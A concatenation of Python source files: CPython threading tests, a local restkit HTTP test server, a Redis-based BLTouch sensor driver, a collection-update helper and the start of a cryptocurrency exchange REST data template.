t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertTrue(t._tstate_lock is None)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # A Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
if __name__ == "__main__":
unittest.main()
|
_updates.py
|
from settings import settings
import os
import threading
def update_collection_check(self):
if self.sav_dir_check():
        self.update_collection()
else:
self.sav_dir_warning()
def update_collection(self):
self.dbManager.create_connection()
self.sav_dir = settings.read_settings()
list_folders = os.listdir(self.sav_dir)
self.dbManager.delete_table()
self.dbManager.create_table()
for folder in list_folders:
folder_path = self.get_folder_path(self.sav_dir, folder)
amount_of_pics_in_folder = len(next(os.walk(folder_path))[2])
self.dbManager.add_character(folder, amount_of_pics_in_folder)
self.dbManager.close_connection()
def update_suggestions(self):
self.suggestionUpdater.reset_suggestion_table()
self.download_thread = threading.Thread(target=self.mainPageSuggestionsUpdater.start_threads)
self.check_thread = threading.Thread(target=self.check_if_done)
self.start_gif()
self.download_thread.start()
self.check_thread.start()
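# The functions above all take ``self``: they appear to be attached to a
# larger manager/GUI class elsewhere in the project.  A minimal sketch of that
# wiring, purely illustrative -- ``CollectionManagerMixin`` is a hypothetical
# name, and any host class still has to provide the attributes and helpers
# these functions rely on (dbManager, suggestionUpdater,
# mainPageSuggestionsUpdater, sav_dir_check, sav_dir_warning, get_folder_path,
# start_gif, check_if_done).
class CollectionManagerMixin:
    update_collection_check = update_collection_check
    update_collection = update_collection
    update_suggestions = update_suggestions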
|
_server_test.py
|
# -*- coding: utf-8 -
#
# Copyright (c) 2008 (c) Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import socket
import tempfile
import threading
import unittest
import urllib.parse
import http.cookies
try:
from urllib.parse import parse_qsl, parse_qs
except ImportError:
from cgi import parse_qsl, parse_qs
import urllib.request, urllib.parse, urllib.error
from restkit.util import to_bytestring
HOST = 'localhost'
PORT = (os.getpid() % 31000) + 1024
class HTTPTestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.auth = b'Basic ' + base64.encodebytes(b'test:test')[:-1]
self.count = 0
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
self.parsed_uri = urllib.parse.urlparse(urllib.parse.unquote(self.path))
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
            self.query[k] = v
path = self.parsed_uri[2]
if path == "/":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "welcome")
elif path == "/unicode":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "éàù@")
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type")
else:
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/éàù":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/test":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/qint":
test = self.query.get("test", False)
if test and test == "1":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/auth":
extra_headers = [('Content-type', 'text/plain')]
if not 'Authorization' in self.headers:
realm = "test"
extra_headers.append(('WWW-Authenticate', 'Basic realm="%s"' % realm))
self._respond(401, extra_headers, "")
else:
auth = self.headers['Authorization'][len('Basic')+1:]
                auth = base64.b64decode(auth).decode('utf-8').split(':')
if auth[0] == "test" and auth[1] == "test":
self._respond(200, extra_headers, "ok")
else:
self._respond(403, extra_headers, "niet!")
elif path == "/redirect":
extra_headers = [('Content-type', 'text/plain'),
('Location', '/complete_redirect')]
self._respond(301, extra_headers, "")
elif path == "/complete_redirect":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/redirect_to_url":
extra_headers = [('Content-type', 'text/plain'),
('Location', 'http://localhost:%s/complete_redirect' % PORT)]
self._respond(301, extra_headers, "")
elif path == "/pool":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/cookie":
c = http.cookies.SimpleCookie()
c["fig"] = "newton"
c['fig']['path'] = "/"
for k in list(c.keys()):
extra_headers = [('Set-Cookie', str(c[k].output(header='')))]
self._respond(200, extra_headers, "ok")
elif path == "/cookies":
c = http.cookies.SimpleCookie()
c["fig"] = "newton"
c['fig']['path'] = "/"
c["sugar"] = "wafer"
c['sugar']['path'] = "/"
extra_headers = []
for k in list(c.keys()):
extra_headers.append(('Set-Cookie', str(c[k].output(header=''))))
self._respond(200, extra_headers, "ok")
else:
self._respond(404,
                          [('Content-type', 'text/plain')], "Not Found")
def do_POST(self):
self.parsed_uri = urllib.parse.urlparse(self.path)
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
            self.query[k] = v
path = self.parsed_uri[2]
extra_headers = []
if path == "/":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/bytestring":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/unicode":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type: %s" % content_type)
else:
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/empty":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
            if body == b"":
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/form":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
            form = parse_qs(body.decode('utf-8'))
if form['a'] == ["a"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multivalueform":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
            form = parse_qs(body.decode('utf-8'))
if form['a'] == ["a", "c"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multipart":
            ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
body = req['t'][0]
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, body)
else:
self.error_Response()
elif path == "/multipart2":
            ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['bb','éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, str(len(f)))
else:
self.error_Response()
elif path == "/multipart3":
            ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, str(len(f)))
else:
self.error_Response()
elif path == "/multipart4":
            ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, f)
else:
self.error_Response()
elif path == "/1M":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, str(len(body)))
elif path == "/large":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-Type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/list":
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/chunked":
te = (self.headers.get("transfer-encoding") == "chunked")
if te:
body = self.rfile.read(29)
extra_headers.append(('Content-Length', "29"))
self._respond(200, extra_headers, body)
else:
self.error_Response()
else:
self.error_Response('Bad path')
do_PUT = do_POST
def do_DELETE(self):
if self.path == "/delete":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def do_HEAD(self):
if self.path == "/ok":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def error_Response(self, message=None):
req = [
('HTTP method', self.command),
('path', self.path),
]
if message:
req.append(('message', message))
body_parts = ['Bad request:\r\n']
for k, v in req:
body_parts.append(' %s: %s\r\n' % (k, v))
body = ''.join(body_parts)
self._respond(400, [('Content-type', 'text/plain'),
('Content-Length', str(len(body)))], body)
def _respond(self, http_code, extra_headers, body):
self.send_response(http_code)
keys = []
for k, v in extra_headers:
self.send_header(k, v)
keys.append(k)
if body:
body = to_bytestring(body)
#if body and "Content-Length" not in keys:
# self.send_header("Content-Length", len(body))
self.end_headers()
self.wfile.write(body)
# self.wfile.close()
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
# self.wfile.close()
# self.rfile.close()
server_thread = None
def run_server_test():
global server_thread
if server_thread is not None:
return
server = HTTPServer((HOST, PORT), HTTPTestHandler)
server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
server_thread.start()
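# A minimal sketch of exercising the test server directly with the standard
# library; ``_smoke_test`` is illustrative only and not part of the restkit
# test suite.
def _smoke_test():
    """Start the shared test server (if needed) and fetch the root resource."""
    run_server_test()
    url = "http://%s:%s/" % (HOST, PORT)
    with urllib.request.urlopen(url) as resp:
        assert resp.status == 200
        assert resp.read() == b"welcome"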
|
driver.py
|
from redis import Redis
from threading import Thread
from bltouch import config as cfg
from bltouch import command_getter, data_producer
from bltouch import sensor
def main():
print(cfg.REDIS_HOST, cfg.REDIS_PORT, cfg.REDIS_PASSWORD)
redis_instance = Redis(cfg.REDIS_HOST, cfg.REDIS_PORT, cfg.REDIS_PASSWORD)
    blt = sensor.BLTouch(port=cfg.BLTOUCH_SERIAL_PORT, baudrate=cfg.BLTOUCH_BAUDRATE)
getter = command_getter.CommandGetter(
redis_instance,
channel="device-command-bltouch",
sensor=blt
)
producer = data_producer.DataProducer(
redis_instance,
channel="device-data-bltouch",
sensor=blt
)
getter_thread = Thread(target=getter.loop)
producer_thread = Thread(target=producer.loop)
getter_thread.start()
producer_thread.start()
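# ``main`` is defined above but never invoked; the guard below is assumed to
# be the intended entry point when this module is run as a script.
if __name__ == "__main__":
    main()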
|
restful_template.py
|
from bitfeeds.socket.restful import RESTfulApiSocket
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.market_data import L2Depth, Trade
from bitfeeds.util import Logger
from bitfeeds.instrument import Instrument
from bitfeeds.sql_storage_template import SqlStorageTemplate
from functools import partial
from datetime import datetime
from multiprocessing import Process
import time
class RESTfulApiTemplate(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
        super(RESTfulApiTemplate, self).__init__()
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://data.btcchina.com/data/orderbook?limit=5&market=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://data.btcchina.com/data/historydata?market=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://data.btcchina.com/data/historydata?limit=100&market=%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_order_book_timestamp_field_name() in keys and \
cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
date_time = float(raw[cls.get_order_book_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
l2_depth.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Bids
